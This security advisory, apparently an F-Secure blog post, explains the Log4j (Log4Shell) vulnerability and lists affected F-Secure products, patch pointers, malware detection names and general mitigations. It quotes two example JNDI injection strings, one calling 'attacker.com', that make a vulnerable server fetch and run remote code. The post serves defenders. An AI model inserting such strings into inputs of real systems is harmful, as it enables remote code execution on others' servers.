A vulnerability in the Log4J library identified on Friday, December 10th is rocking software vendors and service providers around the globe. The weakness in the standardized method of handling log messages within software ranging from Microsoft’s Minecraft to ecommerce platforms is already under assault by attackers.
It’s almost impossible to describe the amount of risk that exists in vulnerable apps right now. If a user-controlled string targeting the vulnerability is logged, the exploit can be executed remotely. In the simplest terms, it allows an attacker to use this vulnerability to cause the target system to fetch and run code from a remote location. The second stage – what the malicious code does – is fully up to the attacker.
A ‘nearly perfect storm’
This nearly perfect storm is another reminder of how hard it to secure multiple layers of enterprise software. Legacy software, including older versions of Java, will force many organizations to develop their own patches or prevent them from patching immediately. Another complication comes from the challenge of correctly patching the logging functions of Log4j in real time, right when the threat of attack is so high and logging is so essential.
All recommended mitigations should be applied “immediately”, the Cybersecurity & Infrastructure Security Agency insisted in a blog post.
There’s not much that individual users can do, other than install updates for various online services as they become available. Companies and enterprises, however, will be working non-stop to provide those fixes, as they secure their own systems. And once exposure has been remedied, steps should be taken to assess if an active incident is underway within the affected systems.
Vulnerabilities almost anywhere
Finding an app that doesn’t use Log4J library may be harder than finding one that does. This omnipresence means attackers can go looking for vulnerabilities almost anywhere.
“Please don’t change your Tesla or iPhone name into ${jndi:ldap://url/a} unless you want unexpected user experience,” said Erka Koivunen, F-Secure’s Chief Information Security Officer, half-jokingly.
Using Log4J’s formatting language could trigger code in vulnerable applications around the globe. Just the mention of the phrase like “${jndi:ldap://attacker.com/pwnyourserver}” in a Minecraft chat in an unpatched system, for instance, could set off a security firestorm at Microsoft.
Are F-Secure products affected?
F-Secure has identified that the following products are affected by this vulnerability:
- F-Secure Policy Manager
- Note: Only the Policy Manager Server component is affected. Standalone installations of Policy Manager Console are not affected.
- F-Secure Policy Manager Proxy
- F-Secure Endpoint Proxy
- F-Secure Elements Connector
Both Windows and Linux versions of these products should be considered affected. If your F-Secure product is exposed to the internet, you MUST immediately check and patch if needed.
How can I patch my F-Secure product?
F-Secure has created a deployable security patch for this vulnerability. You can find those instructions and ongoing updates about this vulnerability here.
What protection does F-Secure provide against this vulnerability?
F-Secure Endpoint Protection (EPP) is continuously updated with detection for the latest local exploit files, but given the many ways in which exploitation can happen, this only covers part of the problem.
EPP detections will address any payload seen in post-exploitation phase as usual, and at this point in time, F-Secure has had the following detections in place that address some serious attack scenarios. These represents malicious payloads that we have seen ”in the wild” in connection with Log4j exploits.
- TR/Drop.Cobacis.AL
- TR/Rozena.wrdej
- TR/PShell.Agent.SWR
- TR/Coblat.G1
- TR/AD.MeterpreterSC.rywng
Many of these detections have been in available in F-Secure EPP for months already, meaning that customers are proactively protected from these payloads.
Other detections present may also help, as there are multiple ways to use the exploit. This list of useful detections will be updated as the situation evolves.
F-Secure Endpoint Detection and Response (EDR) capabilities are effective independently from this specific vulnerability and malicious activities, particularly those related to post-exploitation, will be detected as normal. We will keep adding new detections on the basis of what we see.
F-Secure Elements Vulnerability Management is being constantly updated to add detections, this page details the current status. It will be updated as new detections are available.
Check the general recommendations in the following section for further mitigations.
What steps should you take in general on all software, regardless of vendor?
Restrict network access, or limit it to trusted sites. If your system cannot connect to Internet to fetch the malicious code, the attack will fail.
Check regularly with vendors to see if there is information on patches and other mitigations related to vulnerabilities.
Consider F-Secure Elements Vulnerability Management, which can help identify vulnerable systems.
Consider F-Secure Elements Endpoint Protection or F-Secure Business Suite products, which can detect and patch vulnerable software on the system they are installed to.
NOTE: The “What protection does F-Secure provide against this vulnerability?” section was added on December 12 at 12:49 PM UTC and updated at 3:13 PM UTC and on December 14 at 12:05 PM UTC. “Are F-Secure products affected?” was updated on December 13 at 11:46 AM UTC.
Categories